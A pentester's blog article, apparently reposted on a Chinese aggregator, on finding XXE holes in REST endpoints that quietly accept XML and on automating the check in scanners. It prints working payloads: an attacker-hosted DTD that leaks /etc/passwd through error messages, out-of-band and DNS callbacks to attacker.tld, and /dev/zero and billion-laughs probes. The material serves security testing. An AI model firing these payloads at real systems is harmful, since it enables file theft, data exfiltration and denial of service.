参考连接:https://www.christian-schneider.net/GenericXxeDetection.html

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions.

This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks.

At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that.

XXE detection in service endpoints

During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml).

So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest.

In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured).

But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work:

  • I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests.
  • I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available).
  • Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise.

As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario.

But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there:

  • The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here):

Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part):

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov):

GET /service/ HTTP/1.1
Host: example.com:443
Content-Type: application/xml
Content-Length: 161 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

Response (delivering the data as file-not-found error message):

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 1851
Connection: close javax.xml.bind.UnmarshalException
- with linked exception:
[java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
... ... ...
... ... ...
... ... ...
apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)]

Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick.

After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick.

As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body).

Automating this as a scanning approach

Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON).

So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned:

  1. Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well).

    • If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)]
    • You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD.
    • If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit).
  2. If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one.
  3. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks):
    • Use a payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches.
  4. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests.
  5. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://127.0.0.1:9876" > %xxe; ]>
    • Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server).
    • Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack".

Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks.

Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded.

Conclusion

As a Pentester
Watch out for any service-like endpoints in the application to pentest and try to force them to accept XML, even when the usage of these endpoints from within the application utilizes other kinds of input formats (like query- or path-params or JSON post bodies). In a lucky case where the endpoint is also configured to accept XML, try to further exploit this as an XXE condition.
As a Scanner Vendor
Try to incorporate ideas like the steps presented in this article into your scanning engines augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable).

Generic XXE Detection的更多相关文章

  1. 论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey

    目录 写在前面 目标检测任务与挑战 目标检测方法汇总 基础子问题 基于DCNN的特征表示 主干网络(network backbone) Methods For Improving Object Rep ...

  2. nginx配合modsecurity实现WAF功能

    一.准备工作 系统:centos 7.2 64位.nginx1.10.2, modsecurity2.9.1 owasp3.0 1.nginx:http://nginx.org/download/ng ...

  3. 如何使用event 10049分析定位library cache lock and library cache pin

    Oracle Library Cache 的 lock 与 pin 说明 一. 相关的基本概念 之前整理了一篇blog,讲了Library Cache 的机制,参考: Oracle Library c ...

  4. R-CNN论文翻译

    R-CNN论文翻译 Rich feature hierarchies for accurate object detection and semantic segmentation 用于精确物体定位和 ...

  5. OpenCV特征点提取----Fast特征

    1.FAST(featuresfrom accelerated segment test)算法 http://blog.csdn.net/yang_xian521/article/details/74 ...

  6. ICCV2013、CVPR2013、ECCV2013目标检测相关论文

    CVPapers 网址: http://www.cvpapers.com/   ICCV2013 Papers about Object Detection: 1. Regionlets for Ge ...

  7. Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition

    Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition Kaiming He, Xiangyu Zh ...

  8. zz深度学习目标检测2014至201901综述

    论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey  发表于 2019-02-14 |  更新 ...

  9. (转载) AutoML 与轻量模型大列表

    作者:guan-yuan 项目地址:awesome-AutoML-and-Lightweight-Models 博客地址:http://www.lib4dev.in/info/guan-yuan/aw ...

随机推荐

  1. python装饰器中的计时器thd.strat用法

    thd = KThread(target=_new_func, args=(), kwargs=new_kwargs) thd.start() thd.join(seconds) alive = th ...

  2. MySQL -- 单行函数

    大小写控制函数 SELECT LOWER('HelloWrold'), UPPER('HelloWorld'); 字符控制函数 SELECT REPLACE('abcdababab','p','m') ...

  3. Opennebula常用命令

    查看虚拟机状态信息: [oneadmin@localhost /]$ onevm list 查看虚拟机配置: [oneadmin@localhost /]$ onevm show 25 启动虚拟机: ...

  4. 洛谷P1731 生日蛋糕

    李煜东太神了啊啊啊啊啊! 生日蛋糕,著名搜索神题(还有虫食算). 当年的我30分.... 这哥们的程序0ms... 还有他的树网的核也巨TM神. 疯狂剪枝! DFS(int d, int s, int ...

  5. P1966 火柴排队

    这道题需要小小的思考一波 (然而我思考了两节课) 好,我们先得出一个结论:a中第k大的与b中第k大的一定要排在一起,才能保证最小. 然后发现:挪a,b其实没有区别,故我们固定a,挪b. 然后我们就思考 ...

  6. Django 获取访问者信息

    request内的META里有请求用户的信息 #定义视图方法 def get_ip(request): #打印头部所以信息 # print(request.META) # 获取ip信息 if &quo ...

  7. 腾讯云centos安装python3.6和pip

    不知道腾讯云的centos和阿里云的centos一不一样,反正两个云平台的Ubuntu系统是不一样的,照着同样的教程敲,往往掉坑里. 安装一些centos依赖库: 这一步很关键,很多报错往往都因为少了 ...

  8. 第一篇-ubuntu18.04访问共享文件夹

    1. 在访问Windows共享资料之前,请确保Windows共享是可用的.Linux访问Windows共享或者LInux共享资料给Windows时,都使用Samba软件 rpm -qa | grep ...

  9. iis8.0 https配置教程

    打开iis>选择左侧根>点击右侧服务器证书 打开界面后 空白处点击右键选择导入 成功导入证书 选择需要绑定证书的网站点击选择>编辑绑定>ssl证书请选择您导入的证书 点击SSL ...

  10. logistics回归简单应用(二)

    警告:本文为小白入门学习笔记 网上下载的数据集链接:https://pan.baidu.com/s/1NwSXJOCzgihPFZfw3NfnfA 密码: jmwz 不知道这个数据集干什么用的,根据直 ...